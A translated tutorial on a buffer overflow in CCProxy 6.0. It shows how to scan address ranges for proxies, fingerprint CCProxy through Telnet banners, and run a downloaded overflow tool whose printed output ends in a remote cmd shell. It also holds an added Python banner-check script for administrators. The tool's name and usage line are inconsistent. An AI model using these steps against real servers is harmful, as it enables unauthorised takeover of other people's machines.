A proxy server solves many problems, such as blocking hacker attacks and sharing an Internet connection across a LAN. This article discusses a vulnerability in proxy server software that deserves your attention. To expose this hidden danger and help you find out whether your own proxy server is affected, we will simulate a hacker attack against the vulnerability so that you can take appropriate security measures.
I. Proxy software vulnerability
CCProxy has become the most popular proxy server software in China because it is easy to configure and easy to use. It supports not only the common HTTP and SOCKS proxies but also the less commonly used FTP and Telnet proxies. It can also control access permissions for the proxy and set a user name and password for accessing the proxy server, which makes it very powerful.
An overflow vulnerability was recently disclosed in this outstanding proxy software that allows attackers to gain control of the proxy server directly. The affected CCProxy versions are the currently very popular version 6.0 and all previous versions.
Software Materials
Software name: CCProxy
Software Version: 6.0
License: Shareware
Software size: 820 KB
Download address: http://www2.skycn.com/soft/1058.html
II. Test the CCProxy Server
To use the vulnerability described above to control a proxy server, you must first determine whether CCProxy is installed on the target proxy server (Figure 1).
Figure 1 CCProxy supports proxies for multiple protocols
Because the SOCKS proxy service port of all proxy server software is "1080" by default, we can use this port to find proxy servers and then confirm whether a server has CCProxy installed. After testing, the following detection methods were found to be the most practical and reliable.
1. Scan
Use the port scanner superscan to scan the specified network segment for hosts with port 1080 open. Open superscan, set the scan port range to "1080 ~ 1080" in the "all ports from" field, and then enter the IP address range to be scanned in the target IP address fields. Click the start button to scan. Soon, you will see all hosts in the scanned IP address range that have port 1080 open (Figure 2). Select a host and check whether the CCProxy proxy is installed on it.
Figure 2 Hosts with open ports are marked with green check marks
2. Probe
By default, CCProxy uses "23" as the proxy port of the Telnet service and "2121" as the proxy port of the FTP service. We only need to probe these ports for information to find out whether the target host is a CCProxy server.
Open the CMD command line window and use Telnet to connect to the target host. The command format is:
Telnet Destination IP port (for example, "Telnet 127.0.0.1 23")
If the target proxy server is running CCProxy in the password-free state (that is, no proxy user name and password have been set), the message "CCProxy Telnet Server Ready" appears. If the target proxy server is running CCProxy in the password state (that is, a proxy user name and password have been set), you are prompted for a user name, and the error message "User invalid" is displayed after a few characters are entered. These messages are unique to the CCProxy proxy software, so you can easily determine whether CCProxy is installed on the target proxy server (Figure 3).
Figure 3 The two running modes of CCProxy
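For administrators who want to run the Telnet check described above against their own proxy servers, the following added example (not part of the original article) automates it and reports which of the two modes a host is in. The result labels, the function names and the placeholder user name "audit" are assumptions; the two marker strings are the ones quoted above.

```python
import socket

# Strings the article reports as unique to CCProxy's Telnet proxy.
READY = "CCProxy Telnet Server Ready"   # password-free mode
INVALID = "User invalid"                # password mode, after bogus input

def classify(transcript: str) -> str:
    """Map text received from a Telnet proxy port to a CCProxy running mode."""
    text = transcript.lower()
    if READY.lower() in text:
        return "ccproxy-no-password"
    if INVALID.lower() in text:
        return "ccproxy-password"
    return "not-identified"

def read_some(sock: socket.socket) -> str:
    """Read whatever arrives before the timeout; tolerate silence and resets."""
    chunks = []
    try:
        while len(chunks) < 8:
            data = sock.recv(1024)
            if not data:
                break
            chunks.append(data)
    except (socket.timeout, ConnectionError):
        pass
    return b"".join(chunks).decode("latin-1", errors="replace")

def check_host(host: str, port: int = 23, timeout: float = 3.0) -> str:
    """Check one proxy server you administer; returns a classify() label."""
    seen = ""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            seen = read_some(sock)
            if classify(seen) == "not-identified":
                sock.sendall(b"audit\r\n")   # placeholder user name (assumption)
                seen += read_some(sock)
    except OSError:
        return "unreachable"
    return classify(seen)

if __name__ == "__main__":
    import sys
    for target in sys.argv[1:]:              # hosts from your own inventory
        print(target, check_host(target))
```

A host reported as "ccproxy-no-password" is both identifiable as CCProxy and usable without credentials, so it is the first one to review.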
III. Attack the CCProxy Server
Once the method above has confirmed that the target is a proxy server with CCProxy installed, the next step is to overflow it with the CCProxy overflow attack tool. "ccpx.exe" is a CCProxy overflow attack tool downloaded from the Internet. Run it in the CMD command line to see its help message:
Usage: ccproxyexp.exe [target_port]
"target_ip" is the IP address of the target host, and "target_port" is the main port of CCProxy. The default value is "808".
Enter the attack command with these parameters and follow the prompts:
Is the Host IP address in the same network segment as the target host IP address? [Y/n] y
[+] Connection to 127.0.0.1: 808
[+] Send magic buffer...
[+] Connecting to cmd shell port...
Microsoft Windows 2000 [version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\winnt\System32
The overflow succeeds, and control of the proxy server is obtained (Figure 4).
Figure 4 Control of the server is obtained after the overflow